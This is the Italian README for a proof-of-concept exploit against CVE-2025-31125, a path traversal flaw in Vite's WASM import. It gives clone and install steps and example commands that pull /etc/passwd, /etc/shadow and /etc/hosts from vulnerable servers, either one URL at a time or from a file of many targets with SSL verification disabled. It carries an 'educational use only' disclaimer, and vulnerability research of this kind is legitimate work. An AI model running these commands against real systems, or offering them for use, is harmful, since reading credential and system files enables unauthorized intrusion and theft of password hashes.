
Vite - Attraversamento del percorso di importazione WASM 🛡️
Questo script è un exploit proof-of-concept (PoC) per CVE-2025-31125, una vulnerabilità trovata in Vite. L'exploit sfrutta un problema di Path Traversal nell'Import WASM per recuperare file sensibili da server vulnerabili che eseguono il framework Vite. Consente agli attaccanti di accedere a file come /etc/passwd, /etc/shadow, /etc/hosts e altri file sensibili esposti dal server. ⚠️
Questo strumento è solo a scopo educativo e dovrebbe essere utilizzato solo su sistemi di tua proprietà o per i quali hai avuto esplicito permesso di testare. L'accesso non autorizzato ai sistemi è illegale e può comportare conseguenze legali. Usa questo strumento in modo responsabile! ⚖️
/etc/passwd, /etc/shadow e altri! 💻requests 📦urllib3 🔒toilet (opzionale, per il banner) 🎨pip3 install -r requirements.txt
Per installare toilet (opzionale per il banner) sul tuo sistema:
sudo apt install toiletbrew install toiletgit clone https://github.com/0xgh057r3c0n/CVE-2025-31125.git
cd CVE-2025-31125
pip3 install -r requirements.txt
Per utilizzare lo script, fornisci un singolo URL target usando -u o un file con più URL target usando -f.
-u, --url: Target singolo URL. 🌐-f, --file: Fornisci un file con una lista di URL target (uno per riga). 📄--path: Specifica il percorso da sfruttare (es. /etc/passwd, /etc/shadow). Il default è /etc/passwd. 🛠️--no-verify: Disabilita la verifica SSL (utile per certificati auto-firmati). 🔒/etc/passwd)python3 exploit.py -u https://example.com --no-verify
/etc/shadow)python3 exploit.py -u https://example.com --no-verify --path /etc/shadow
/etc/passwd)python3 exploit.py -f targets.txt --no-verify
/etc/hosts)python3 exploit.py -f targets.txt --no-verify --path /etc/hosts
🙋♂️ Contatti (per collaborazione, ricerca e discussioni sulla cybersecurity):
Questo progetto è concesso in licenza sotto la MIT License. 🌟
